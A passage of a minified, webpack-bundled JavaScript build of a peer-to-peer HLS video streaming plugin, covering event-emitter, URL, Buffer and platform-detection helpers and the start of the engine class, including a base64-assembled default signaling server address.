function _typeof(obj) {
    '@babel/helpers - typeof';
    if (typeof Symbol === 'function' && typeof Symbol.iterator === 'symbol') {
        _typeof = function _typeof(obj) {
            return typeof obj;
        };
    } else {
        _typeof = function _typeof(obj) {
            return obj && typeof Symbol === 'function' && obj.constructor === Symbol && obj !== Symbol.prototype ? 'symbol' : typeof obj;
        };
    }
    return _typeof(obj);
}
!function (e, t) {
    'object' == (typeof exports === 'undefined' ? 'undefined' : _typeof(exports)) && 'object' == (typeof module === 'undefined' ? 'undefined' : _typeof(module)) ? module.exports = t() : 'function' == typeof define && define.amd ? define([], t) : 'object' == (typeof exports === 'undefined' ? 'undefined' : _typeof(exports)) ? exports.P2PEngine = t() : e.P2PEngine = t();
}('undefined' != typeof self ? self : this, function () {
    return function (e) {
        function t(r) {
            if (n[r])
                return n[r].exports;
            var o = n[r] = {
                i: r,
                l: !1,
                exports: {}
            };
            return e[r].call(o.exports, o, o.exports, t), o.l = !0, o.exports;
        }
        var n = {};
        return t.m = e, t.c = n, t.d = function (e, n, r) {
            t.o(e, n) || Object.defineProperty(e, n, {
                configurable: !1,
                enumerable: !0,
                get: r
            });
        }, t.n = function (e) {
            var n = e && e.__esModule ? function () {
                return e['default'];
            } : function () {
                return e;
            };
            return t.d(n, 'a', n), n;
        }, t.o = function (e, t) {
            return Object.prototype.hasOwnProperty.call(e, t);
        }, t.p = '', t(t.s = 8);
    }([
        function (e, t, n) {
            'use strict';
            function r(e) {
                console && console.warn && console.warn(e);
            }
            function o() {
                o.init.call(this);
            }
            function i(e) {
                if ('function' != typeof e)
                    throw new TypeError('The "listener" argument must be of type Function. Received type ' + _typeof(e));
            }
            function a(e) {
                return void 0 === e._maxListeners ? o.defaultMaxListeners : e._maxListeners;
            }
            function s(e, t, n, o) {
                var s, c, u;
                if (i(n), c = e._events, void 0 === c ? (c = e._events = Object.create(null), e._eventsCount = 0) : (void 0 !== c.newListener && (e.emit('newListener', t, n.listener ? n.listener : n), c = e._events), u = c[t]), void 0 === u)
                    u = c[t] = n, ++e._eventsCount;
                else if ('function' == typeof u ? u = c[t] = o ? [
                        n,
                        u
                    ] : [
                        u,
                        n
                    ] : o ? u.unshift(n) : u.push(n), (s = a(e)) > 0 && u.length > s && !u.warned) {
                    u.warned = !0;
                    var l = new Error('Possible EventEmitter memory leak detected. ' + u.length + ' ' + String(t) + ' listeners added. Use emitter.setMaxListeners() to increase limit');
                    l.name = 'MaxListenersExceededWarning', l.emitter = e, l.type = t, l.count = u.length, r(l);
                }
                return e;
            }
            function c() {
                if (!this.fired)
                    return this.target.removeListener(this.type, this.wrapFn), this.fired = !0, 0 === arguments.length ? this.listener.call(this.target) : this.listener.apply(this.target, arguments);
            }
            function u(e, t, n) {
                var r = {
                        fired: !1,
                        wrapFn: void 0,
                        target: e,
                        type: t,
                        listener: n
                    }, o = c.bind(r);
                return o.listener = n, r.wrapFn = o, o;
            }
            function l(e, t, n) {
                var r = e._events;
                if (void 0 === r)
                    return [];
                var o = r[t];
                return void 0 === o ? [] : 'function' == typeof o ? n ? [o.listener || o] : [o] : n ? p(o) : d(o, o.length);
            }
            function f(e) {
                var t = this._events;
                if (void 0 !== t) {
                    var n = t[e];
                    if ('function' == typeof n)
                        return 1;
                    if (void 0 !== n)
                        return n.length;
                }
                return 0;
            }
            function d(e, t) {
                for (var n = new Array(t), r = 0; r < t; ++r) {
                    n[r] = e[r];
                }
                return n;
            }
            function h(e, t) {
                for (; t + 1 < e.length; t++) {
                    e[t] = e[t + 1];
                }
                e.pop();
            }
            function p(e) {
                for (var t = new Array(e.length), n = 0; n < t.length; ++n) {
                    t[n] = e[n].listener || e[n];
                }
                return t;
            }
            var g, v = 'object' == (typeof Reflect === 'undefined' ? 'undefined' : _typeof(Reflect)) ? Reflect : null, y = v && 'function' == typeof v.apply ? v.apply : function (e, t, n) {
                    return Function.prototype.apply.call(e, t, n);
                };
            g = v && 'function' == typeof v.ownKeys ? v.ownKeys : Object.getOwnPropertySymbols ? function (e) {
                return Object.getOwnPropertyNames(e).concat(Object.getOwnPropertySymbols(e));
            } : function (e) {
                return Object.getOwnPropertyNames(e);
            };
            var m = Number.isNaN || function (e) {
                return e !== e;
            };
            e.exports = o, o.EventEmitter = o, o.prototype._events = void 0, o.prototype._eventsCount = 0, o.prototype._maxListeners = void 0;
            var _ = 10;
            Object.defineProperty(o, 'defaultMaxListeners', {
                enumerable: !0,
                get: function get() {
                    return _;
                },
                set: function set(e) {
                    if ('number' != typeof e || e < 0 || m(e))
                        throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received ' + e + '.');
                    _ = e;
                }
            }), o.init = function () {
                void 0 !== this._events && this._events !== Object.getPrototypeOf(this)._events || (this._events = Object.create(null), this._eventsCount = 0), this._maxListeners = this._maxListeners || void 0;
            }, o.prototype.setMaxListeners = function (e) {
                if ('number' != typeof e || e < 0 || m(e))
                    throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received ' + e + '.');
                return this._maxListeners = e, this;
            }, o.prototype.getMaxListeners = function () {
                return a(this);
            }, o.prototype.emit = function (e) {
                for (var t = [], n = 1; n < arguments.length; n++) {
                    t.push(arguments[n]);
                }
                var r = 'error' === e, o = this._events;
                if (void 0 !== o)
                    r = r && void 0 === o.error;
                else if (!r)
                    return !1;
                if (r) {
                    var i;
                    if (t.length > 0 && (i = t[0]), i instanceof Error)
                        throw i;
                    var a = new Error('Unhandled error.' + (i ? ' (' + i.message + ')' : ''));
                    throw a.context = i, a;
                }
                var s = o[e];
                if (void 0 === s)
                    return !1;
                if ('function' == typeof s)
                    y(s, this, t);
                else
                    for (var c = s.length, u = d(s, c), n = 0; n < c; ++n) {
                        y(u[n], this, t);
                    }
                return !0;
            }, o.prototype.addListener = function (e, t) {
                return s(this, e, t, !1);
            }, o.prototype.on = o.prototype.addListener, o.prototype.prependListener = function (e, t) {
                return s(this, e, t, !0);
            }, o.prototype.once = function (e, t) {
                return i(t), this.on(e, u(this, e, t)), this;
            }, o.prototype.prependOnceListener = function (e, t) {
                return i(t), this.prependListener(e, u(this, e, t)), this;
            }, o.prototype.removeListener = function (e, t) {
                var n, r, o, a, s;
                if (i(t), void 0 === (r = this._events))
                    return this;
                if (void 0 === (n = r[e]))
                    return this;
                if (n === t || n.listener === t)
                    0 == --this._eventsCount ? this._events = Object.create(null) : (delete r[e], r.removeListener && this.emit('removeListener', e, n.listener || t));
                else if ('function' != typeof n) {
                    for (o = -1, a = n.length - 1; a >= 0; a--) {
                        if (n[a] === t || n[a].listener === t) {
                            s = n[a].listener, o = a;
                            break;
                        }
                    }
                    if (o < 0)
                        return this;
                    0 === o ? n.shift() : h(n, o), 1 === n.length && (r[e] = n[0]), void 0 !== r.removeListener && this.emit('removeListener', e, s || t);
                }
                return this;
            }, o.prototype.off = o.prototype.removeListener, o.prototype.removeAllListeners = function (e) {
                var t, n, r;
                if (void 0 === (n = this._events))
                    return this;
                if (void 0 === n.removeListener)
                    return 0 === arguments.length ? (this._events = Object.create(null), this._eventsCount = 0) : void 0 !== n[e] && (0 == --this._eventsCount ? this._events = Object.create(null) : delete n[e]), this;
                if (0 === arguments.length) {
                    var o, i = Object.keys(n);
                    for (r = 0; r < i.length; ++r) {
                        'removeListener' !== (o = i[r]) && this.removeAllListeners(o);
                    }
                    return this.removeAllListeners('removeListener'), this._events = Object.create(null), this._eventsCount = 0, this;
                }
                if ('function' == typeof (t = n[e]))
                    this.removeListener(e, t);
                else if (void 0 !== t)
                    for (r = t.length - 1; r >= 0; r--) {
                        this.removeListener(e, t[r]);
                    }
                return this;
            }, o.prototype.listeners = function (e) {
                return l(this, e, !0);
            }, o.prototype.rawListeners = function (e) {
                return l(this, e, !1);
            }, o.listenerCount = function (e, t) {
                return 'function' == typeof e.listenerCount ? e.listenerCount(t) : f.call(e, t);
            }, o.prototype.listenerCount = f, o.prototype.eventNames = function () {
                return this._eventsCount > 0 ? g(this._events) : [];
            };
        },
        function (e, t, n) {
            'use strict';
            function r() {
                return !0;
            }
            function o(e) {
                var t = new RegExp('(^|&)' + e + '=([^&]*)(&|$)'), n = window.location.search.substr(1).match(t);
                return null != n && '' !== n[2] ? n[2].toString() : '';
            }
            function i(e, t) {
                var n = u['default'].parseURL(e), r = n.path.split('.')[1];
                return -1 !== t.indexOf(r);
            }
            function a() {
                return Date.parse(new Date()) / 1000;
            }
            function s(e, t) {
                return parseInt(Math.random() * (t - e + 1) + e, 10);
            }
            Object.defineProperty(t, '__esModule', { value: !0 }), t.noop = r, t.getQueryParam = o, t.isBlockType = i, t.getCurrentTs = a, t.randomNum = s;
            var c = n(3), u = function (e) {
                    return e && e.__esModule ? e : { 'default': e };
                }(c);
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            Object.defineProperty(t, '__esModule', { value: !0 }), t.config = t.Tracker = t.getPeersThrottle = t.getBrowserRTC = t.Buffer = t.Fetcher = t.Events = t.DataChannel = void 0;
            var o = n(10), i = r(o), a = n(4), s = r(a), c = n(13), u = r(c), l = n(16), f = r(l), d = n(17), h = r(d), p = n(18), g = r(p), v = n(23), y = r(v), m = n(6).Buffer;
            t.DataChannel = i['default'], t.Events = s['default'], t.Fetcher = u['default'], t.Buffer = m, t.getBrowserRTC = f['default'], t.getPeersThrottle = h['default'], t.Tracker = g['default'], t.config = y['default'];
        },
        function (e, t, n) {
            !function (t) {
                var n = /^((?:[a-zA-Z0-9+\-.]+:)?)(\/\/[^\/?#]*)?((?:[^\/?#]*\/)*[^;?#]*)?(;[^?#]*)?(\?[^#]*)?(#.*)?$/, r = /^([^\/?#]*)(.*)$/, o = /(?:\/|^)\.(?=\/)/g, i = /(?:\/|^)\.\.\/(?!\.\.\/)[^\/]*(?=\/)/g, a = {
                        buildAbsoluteURL: function buildAbsoluteURL(e, t, n) {
                            if (n = n || {}, e = e.trim(), !(t = t.trim())) {
                                if (!n.alwaysNormalize)
                                    return e;
                                var o = a.parseURL(e);
                                if (!o)
                                    throw new Error('Error trying to parse base URL.');
                                return o.path = a.normalizePath(o.path), a.buildURLFromParts(o);
                            }
                            var i = a.parseURL(t);
                            if (!i)
                                throw new Error('Error trying to parse relative URL.');
                            if (i.scheme)
                                return n.alwaysNormalize ? (i.path = a.normalizePath(i.path), a.buildURLFromParts(i)) : t;
                            var s = a.parseURL(e);
                            if (!s)
                                throw new Error('Error trying to parse base URL.');
                            if (!s.netLoc && s.path && '/' !== s.path[0]) {
                                var c = r.exec(s.path);
                                s.netLoc = c[1], s.path = c[2];
                            }
                            s.netLoc && !s.path && (s.path = '/');
                            var u = {
                                scheme: s.scheme,
                                netLoc: i.netLoc,
                                path: null,
                                params: i.params,
                                query: i.query,
                                fragment: i.fragment
                            };
                            if (!i.netLoc && (u.netLoc = s.netLoc, '/' !== i.path[0]))
                                if (i.path) {
                                    var l = s.path, f = l.substring(0, l.lastIndexOf('/') + 1) + i.path;
                                    u.path = a.normalizePath(f);
                                } else
                                    u.path = s.path, i.params || (u.params = s.params, i.query || (u.query = s.query));
                            return null === u.path && (u.path = n.alwaysNormalize ? a.normalizePath(i.path) : i.path), a.buildURLFromParts(u);
                        },
                        parseURL: function parseURL(e) {
                            var t = n.exec(e);
                            return t ? {
                                scheme: t[1] || '',
                                netLoc: t[2] || '',
                                path: t[3] || '',
                                params: t[4] || '',
                                query: t[5] || '',
                                fragment: t[6] || ''
                            } : null;
                        },
                        normalizePath: function normalizePath(e) {
                            for (e = e.split('').reverse().join('').replace(o, ''); e.length !== (e = e.replace(i, '')).length;) {
                                ;
                            }
                            return e.split('').reverse().join('');
                        },
                        buildURLFromParts: function buildURLFromParts(e) {
                            return e.scheme + e.netLoc + e.path + e.params + e.query + e.fragment;
                        }
                    };
                e.exports = a;
            }();
        },
        function (e, t, n) {
            'use strict';
            Object.defineProperty(t, '__esModule', { value: !0 }), t['default'] = {
                DC_SIGNAL: 'SIGNAL',
                DC_OPEN: 'OPEN',
                DC_REQUEST: 'REQUEST',
                DC_PIECE_NOT_FOUND: 'PIECE_NOT_FOUND',
                DC_CLOSE: 'CLOSE',
                DC_RESPONSE: 'RESPONSE',
                DC_ERROR: 'ERROR',
                DC_PIECE: 'PIECE',
                DC_TIMEOUT: 'TIMEOUT',
                DC_PIECE_ACK: 'PIECE_ACK',
                DC_METADATA: 'METADATA',
                DC_PLAT_ANDROID: 'ANDROID',
                DC_PLAT_IOS: 'IOS',
                DC_PLAT_WEB: 'WEB',
                DC_CHOKE: 'CHOKE',
                DC_UNCHOKE: 'UNCHOKE',
                DC_HAVE: 'HAVE',
                DC_LOST: 'LOST',
                BM_LOST: 'lost',
                FRAG_CHANGED: 'FRAG_CHANGED',
                FRAG_LOADED: 'FRAG_LOADED',
                FRAG_LOADING: 'FRAG_LOADING',
                RESTART_P2P: 'RESTART_P2P'
            }, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r() {
                return navigator.userAgent.toLowerCase();
            }
            function o(e) {
                return '' + (new RegExp(e + '(\\d+((\\.|_)\\d+)*)').exec(r()) || [
                    ,
                    0
                ])[1] || void 0;
            }
            function i(e) {
                return parseFloat((e || '').replace(/\_/g, '.')) || 0;
            }
            var a = {
                    ANDROID_WEB: 'android-web',
                    IOS_WEB: 'iOS-web',
                    PC_NATIVE: 'PC-native',
                    PC_WEB: 'PC-web'
                }, s = {
                    getNetType: function getNetType() {
                        return (new RegExp('nettype\\/(\\w*)').exec(r()) || [
                            ,
                            ''
                        ])[1].toLowerCase();
                    },
                    getPlatform: function getPlatform() {
                        return s.isAndroid() ? a.ANDROID_WEB : s.isIOS() ? a.IOS_WEB : s.isElectron() ? a.PC_NATIVE : a.PC_WEB;
                    },
                    isX5: function isX5() {
                        return this.isAndroid() && /\s(TBS|X5Core)\/[\w\.\-]+/i.test(r());
                    },
                    isPC: function isPC() {
                        return !i(o('os ')) && !i(o('android[/ ]'));
                    },
                    isIOS: function isIOS() {
                        return i(o('os '));
                    },
                    isAndroid: function isAndroid() {
                        return i(o('android[/ ]'));
                    },
                    isSafari: function isSafari() {
                        return this.isIOS() && /^((?!chrome|android).)*safari/i.test(r());
                    },
                    isElectron: function isElectron() {
                        return /electron/i.test(r());
                    },
                    isMobile: function isMobile() {
                        return s.isAndroid() || s.isIOS();
                    },
                    device: a
                };
            e.exports = s;
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                if (e > _)
                    throw new RangeError('The value "' + e + '" is invalid for option "size"');
                var t = new Uint8Array(e);
                return t.__proto__ = o.prototype, t;
            }
            function o(e, t, n) {
                if ('number' == typeof e) {
                    if ('string' == typeof t)
                        throw new TypeError('The "string" argument must be of type string. Received type number');
                    return c(e);
                }
                return i(e, t, n);
            }
            function i(e, t, n) {
                if ('string' == typeof e)
                    return u(e, t);
                if (ArrayBuffer.isView(e))
                    return l(e);
                if (null == e)
                    throw TypeError('The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type ' + (void 0 === e ? 'undefined' : m(e)));
                if (v(e, ArrayBuffer) || e && v(e.buffer, ArrayBuffer))
                    return f(e, t, n);
                if ('number' == typeof e)
                    throw new TypeError('The "value" argument must not be of type number. Received type number');
                var r = e.valueOf && e.valueOf();
                if (null != r && r !== e)
                    return o.from(r, t, n);
                var i = d(e);
                if (i)
                    return i;
                if ('undefined' != typeof Symbol && null != Symbol.toPrimitive && 'function' == typeof e[Symbol.toPrimitive])
                    return o.from(e[Symbol.toPrimitive]('string'), t, n);
                throw new TypeError('The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type ' + (void 0 === e ? 'undefined' : m(e)));
            }
            function a(e) {
                if ('number' != typeof e)
                    throw new TypeError('"size" argument must be of type number');
                if (e < 0)
                    throw new RangeError('The value "' + e + '" is invalid for option "size"');
            }
            function s(e, t, n) {
                return a(e), e <= 0 ? r(e) : void 0 !== t ? 'string' == typeof n ? r(e).fill(t, n) : r(e).fill(t) : r(e);
            }
            function c(e) {
                return a(e), r(e < 0 ? 0 : 0 | h(e));
            }
            function u(e, t) {
                if ('string' == typeof t && '' !== t || (t = 'utf8'), !o.isEncoding(t))
                    throw new TypeError('Unknown encoding: ' + t);
                var n = 0 | p(e, t), i = r(n), a = i.write(e, t);
                return a !== n && (i = i.slice(0, a)), i;
            }
            function l(e) {
                for (var t = e.length < 0 ? 0 : 0 | h(e.length), n = r(t), o = 0; o < t; o += 1) {
                    n[o] = 255 & e[o];
                }
                return n;
            }
            function f(e, t, n) {
                if (t < 0 || e.byteLength < t)
                    throw new RangeError('"offset" is outside of buffer bounds');
                if (e.byteLength < t + (n || 0))
                    throw new RangeError('"length" is outside of buffer bounds');
                var r;
                return r = void 0 === t && void 0 === n ? new Uint8Array(e) : void 0 === n ? new Uint8Array(e, t) : new Uint8Array(e, t, n), r.__proto__ = o.prototype, r;
            }
            function d(e) {
                if (o.isBuffer(e)) {
                    var t = 0 | h(e.length), n = r(t);
                    return 0 === n.length ? n : (e.copy(n, 0, 0, t), n);
                }
                return void 0 !== e.length ? 'number' != typeof e.length || y(e.length) ? r(0) : l(e) : 'Buffer' === e.type && Array.isArray(e.data) ? l(e.data) : void 0;
            }
            function h(e) {
                if (e >= _)
                    throw new RangeError('Attempt to allocate Buffer larger than maximum size: 0x' + _.toString(16) + ' bytes');
                return 0 | e;
            }
            function p(e, t) {
                if (o.isBuffer(e))
                    return e.length;
                if (ArrayBuffer.isView(e) || v(e, ArrayBuffer))
                    return e.byteLength;
                if ('string' != typeof e)
                    throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type ' + (void 0 === e ? 'undefined' : m(e)));
                var n = e.length, r = arguments.length > 2 && !0 === arguments[2];
                if (!r && 0 === n)
                    return 0;
                for (var i = !1;;) {
                    switch (t) {
                    case 'ascii':
                    case 'latin1':
                    case 'binary':
                        return n;
                    case 'utf8':
                    case 'utf-8':
                        return g(e).length;
                    case 'ucs2':
                    case 'ucs-2':
                    case 'utf16le':
                    case 'utf-16le':
                        return 2 * n;
                    case 'hex':
                        return n >>> 1;
                    default:
                        if (i)
                            return r ? -1 : g(e).length;
                        t = ('' + t).toLowerCase(), i = !0;
                    }
                }
            }
            function g(e, t) {
                t = t || 1 / 0;
                for (var n, r = e.length, o = null, i = [], a = 0; a < r; ++a) {
                    if ((n = e.charCodeAt(a)) > 55295 && n < 57344) {
                        if (!o) {
                            if (n > 56319) {
                                (t -= 3) > -1 && i.push(239, 191, 189);
                                continue;
                            }
                            if (a + 1 === r) {
                                (t -= 3) > -1 && i.push(239, 191, 189);
                                continue;
                            }
                            o = n;
                            continue;
                        }
                        if (n < 56320) {
                            (t -= 3) > -1 && i.push(239, 191, 189), o = n;
                            continue;
                        }
                        n = 65536 + (o - 55296 << 10 | n - 56320);
                    } else
                        o && (t -= 3) > -1 && i.push(239, 191, 189);
                    if (o = null, n < 128) {
                        if ((t -= 1) < 0)
                            break;
                        i.push(n);
                    } else if (n < 2048) {
                        if ((t -= 2) < 0)
                            break;
                        i.push(n >> 6 | 192, 63 & n | 128);
                    } else if (n < 65536) {
                        if ((t -= 3) < 0)
                            break;
                        i.push(n >> 12 | 224, n >> 6 & 63 | 128, 63 & n | 128);
                    } else {
                        if (!(n < 1114112))
                            throw new Error('Invalid code point');
                        if ((t -= 4) < 0)
                            break;
                        i.push(n >> 18 | 240, n >> 12 & 63 | 128, n >> 6 & 63 | 128, 63 & n | 128);
                    }
                }
                return i;
            }
            function v(e, t) {
                return e instanceof t || null != e && null != e.constructor && null != e.constructor.name && e.constructor.name === t.name;
            }
            function y(e) {
                return e !== e;
            }
            var m = 'function' == typeof Symbol && 'symbol' == _typeof(Symbol.iterator) ? function (e) {
                return _typeof(e);
            } : function (e) {
                return e && 'function' == typeof Symbol && e.constructor === Symbol && e !== Symbol.prototype ? 'symbol' : _typeof(e);
            };
            t.Buffer = o;
            var _ = 2147483647;
            t.kMaxLength = _, o.TYPED_ARRAY_SUPPORT = function () {
                try {
                    var e = new Uint8Array(1);
                    return e.__proto__ = {
                        __proto__: Uint8Array.prototype,
                        foo: function foo() {
                            return 42;
                        }
                    }, 42 === e.foo();
                } catch (e) {
                    return !1;
                }
            }(), o.TYPED_ARRAY_SUPPORT || 'undefined' == typeof console || 'function' != typeof console.error || console.error('This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support.'), 'undefined' != typeof Symbol && null != Symbol.species && o[Symbol.species] === o && Object.defineProperty(o, Symbol.species, {
                value: null,
                configurable: !0,
                enumerable: !1,
                writable: !1
            }), o.from = function (e, t, n) {
                return i(e, t, n);
            }, o.prototype.__proto__ = Uint8Array.prototype, o.__proto__ = Uint8Array, o.alloc = function (e, t, n) {
                return s(e, t, n);
            }, o.allocUnsafe = function (e) {
                return c(e);
            }, o.isBuffer = function (e) {
                return null != e && !0 === e._isBuffer && e !== o.prototype;
            }, o.isEncoding = function (e) {
                switch (String(e).toLowerCase()) {
                case 'hex':
                case 'utf8':
                case 'utf-8':
                case 'ascii':
                case 'latin1':
                case 'binary':
                case 'base64':
                case 'ucs2':
                case 'ucs-2':
                case 'utf16le':
                case 'utf-16le':
                    return !0;
                default:
                    return !1;
                }
            }, o.concat = function (e, t) {
                if (!Array.isArray(e))
                    throw new TypeError('"list" argument must be an Array of Buffers');
                if (0 === e.length)
                    return o.alloc(0);
                var n;
                if (void 0 === t)
                    for (t = 0, n = 0; n < e.length; ++n) {
                        t += e[n].length;
                    }
                var r = o.allocUnsafe(t), i = 0;
                for (n = 0; n < e.length; ++n) {
                    var a = e[n];
                    if (v(a, Uint8Array) && (a = o.from(a)), !o.isBuffer(a))
                        throw new TypeError('"list" argument must be an Array of Buffers');
                    a.copy(r, i), i += a.length;
                }
                return r;
            }, o.byteLength = p, o.prototype._isBuffer = !0, o.prototype.copy = function (e, t, n, r) {
                if (!o.isBuffer(e))
                    throw new TypeError('argument should be a Buffer');
                if (n || (n = 0), r || 0 === r || (r = this.length), t >= e.length && (t = e.length), t || (t = 0), r > 0 && r < n && (r = n), r === n)
                    return 0;
                if (0 === e.length || 0 === this.length)
                    return 0;
                if (t < 0)
                    throw new RangeError('targetStart out of bounds');
                if (n < 0 || n >= this.length)
                    throw new RangeError('Index out of range');
                if (r < 0)
                    throw new RangeError('sourceEnd out of bounds');
                r > this.length && (r = this.length), e.length - t < r - n && (r = e.length - t + n);
                var i = r - n;
                if (this === e && 'function' == typeof Uint8Array.prototype.copyWithin)
                    this.copyWithin(t, n, r);
                else if (this === e && n < t && t < r)
                    for (var a = i - 1; a >= 0; --a) {
                        e[a + t] = this[a + n];
                    }
                else
                    Uint8Array.prototype.set.call(e, this.subarray(n, r), t);
                return i;
            };
        },
        function (e, t) {
            function n() {
                throw new Error('setTimeout has not been defined');
            }
            function r() {
                throw new Error('clearTimeout has not been defined');
            }
            function o(e) {
                if (l === setTimeout)
                    return setTimeout(e, 0);
                if ((l === n || !l) && setTimeout)
                    return l = setTimeout, setTimeout(e, 0);
                try {
                    return l(e, 0);
                } catch (t) {
                    try {
                        return l.call(null, e, 0);
                    } catch (t) {
                        return l.call(this, e, 0);
                    }
                }
            }
            function i(e) {
                if (f === clearTimeout)
                    return clearTimeout(e);
                if ((f === r || !f) && clearTimeout)
                    return f = clearTimeout, clearTimeout(e);
                try {
                    return f(e);
                } catch (t) {
                    try {
                        return f.call(null, e);
                    } catch (t) {
                        return f.call(this, e);
                    }
                }
            }
            function a() {
                g && h && (g = !1, h.length ? p = h.concat(p) : v = -1, p.length && s());
            }
            function s() {
                if (!g) {
                    var e = o(a);
                    g = !0;
                    for (var t = p.length; t;) {
                        for (h = p, p = []; ++v < t;) {
                            h && h[v].run();
                        }
                        v = -1, t = p.length;
                    }
                    h = null, g = !1, i(e);
                }
            }
            function c(e, t) {
                this.fun = e, this.array = t;
            }
            function u() {
            }
            var l, f, d = e.exports = {};
            !function () {
                try {
                    l = 'function' == typeof setTimeout ? setTimeout : n;
                } catch (e) {
                    l = n;
                }
                try {
                    f = 'function' == typeof clearTimeout ? clearTimeout : r;
                } catch (e) {
                    f = r;
                }
            }();
            var h, p = [], g = !1, v = -1;
            d.nextTick = function (e) {
                var t = new Array(arguments.length - 1);
                if (arguments.length > 1)
                    for (var n = 1; n < arguments.length; n++) {
                        t[n - 1] = arguments[n];
                    }
                p.push(new c(e, t)), 1 !== p.length || g || o(s);
            }, c.prototype.run = function () {
                this.fun.apply(null, this.array);
            }, d.title = 'browser', d.browser = !0, d.env = {}, d.argv = [], d.version = '', d.versions = {}, d.on = u, d.addListener = u, d.once = u, d.off = u, d.removeListener = u, d.removeAllListeners = u, d.emit = u, d.prependListener = u, d.prependOnceListener = u, d.listeners = function (e) {
                return [];
            }, d.binding = function (e) {
                throw new Error('process.binding is not supported');
            }, d.cwd = function () {
                return '/';
            }, d.chdir = function (e) {
                throw new Error('process.chdir is not supported');
            }, d.umask = function () {
                return 0;
            };
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            function o(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            function i(e, t) {
                if (!e)
                    throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
            }
            function a(e, t) {
                if ('function' != typeof t && null !== t)
                    throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                e.prototype = Object.create(t && t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var s = Object.assign || function (e) {
                    for (var t = 1; t < arguments.length; t++) {
                        var n = arguments[t];
                        for (var r in n) {
                            Object.prototype.hasOwnProperty.call(n, r) && (e[r] = n[r]);
                        }
                    }
                    return e;
                }, c = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), u = n(0), l = r(u), f = n(3), d = r(f), h = n(9), p = r(h), g = n(24), v = r(g), y = n(2), m = n(25), _ = r(m), b = n(26), w = r(b), C = n(5), P = r(C), E = n(1), S = n(27), T = r(S);
            if (window.p2ploadedHls)
                throw new Error('P2P plugin is loaded before(重复加载P2P插件)');
            window.p2ploadedHls = !0;
            var k = {
                    _: 'nllL',
                    f: 'd3NzJ',
                    ss: '==',
                    3: 'TNBLy9z',
                    8: 'aWduY',
                    u: 'mNvbQ',
                    qa: 'WwuY2RuY'
                }, O = function (e) {
                    function t(e, n) {
                        o(this, t);
                        var r = i(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                        if (n = n || {}, n.tag && n.tag.length > 20)
                            throw new Error('Tag is too long');
                        if (n.appName && n.appName.length > 30)
                            throw new Error('appName is too long');
                        if (n.appId && n.appId.length > 30)
                            throw new Error('appId is too long');
                        if (n.token && n.token.length > 20)
                            throw new Error('Token is too long');
                        r.config = Object.assign({}, p['default'], n), e.config.segmentId = r.config.segmentId, r.hlsjs = e, r.p2pEnabled = !(!1 === r.config.p2pEnabled || '0' === (0, E.getQueryParam)('_p2p')), r.HLSEvents = e.constructor.Events;
                        var a = function n(o, i) {
                            var a = i.details, c = a.live;
                            r.config.live = r.hlsjs.config.live = c, r.config.startSN = a.startSN, r.config.endSN = a.endSN;
                            var u = P['default'].getPlatform();
                            r.netType = P['default'].getNetType() || void 0, r.netType || (r.netType = 'wifi'), r.browserInfo = {
                                device: u,
                                netType: r.netType,
                                tag: r.config.tag || (0, T['default'])(),
                                live: c,
                                type: 'hls'
                            }, u === P['default'].device.PC_NATIVE && (r.browserInfo = s({}, r.browserInfo, {
                                app: r.config.appName,
                                bundle: r.config.appId
                            })), !1 !== r.config.useHttpRange && c && (r.config.useHttpRange = !0), r.config.wsSignalerAddr || (r.config.wsSignalerAddr = window.decodeURIComponent(window.atob(k.f + k[3] + k[8] + k.qa + k._ + k.u + k.ss)));
                            var l = function l(e, t) {
                                var n = d['default'].parseURL(e);
                                return '' + (n.netLoc.substr(2) + n.path.split('.')[0]);
                            };
                            if (r.config.channelId) {
                                var f = r.config.channelIdPrefix;
                                if (!f || 'string' != typeof f)
                                    throw new Error('channelIdPrefix is required while using customized channelId!');
                                if (f.length < 5)
                                    throw new Error('channelIdPrefix length is too short!');
                                if (f.length > 15)
                                    throw new Error('channelIdPrefix length is too long!');
                                l = function l(e, t) {
                                    return f + r.config.channelId(e, t);
                                };
                            }
                            var h = d['default'].parseURL(r.config.wsSignalerAddr).netLoc.substr(2);
                            r.channel = l(e.url, r.browserInfo) + '|' + h + '[v3]';
                            var p = new w['default'](r.config);
                            r.hlsjs.config.logger = r.logger = r.config.logger = p, p.info('P2P version: ' + t.version + ' Hlsjs version: ' + e.constructor.version), p.info('channel ' + r.channel), p.info('device ' + u + ' netType ' + r.netType), r.eventListened = !1, r._init(r.channel, r.browserInfo), p.info('startSN ' + a.startSN + ' endSN ' + a.endSN), e.off(r.HLSEvents.LEVEL_LOADED, n);
                        };
                        return e.on(r.HLSEvents.LEVEL_LOADED, a), r;
                    }
                    return a(t, e), c(t, null, [{
                            key: 'Events',
                            get: function get() {
                                return y.Events;
                            }
                        }]), c(t, [
                        {
                            key: '_init',
                            value: function value(e, t) {
                                var n = this;
                                if (this.p2pEnabled) {
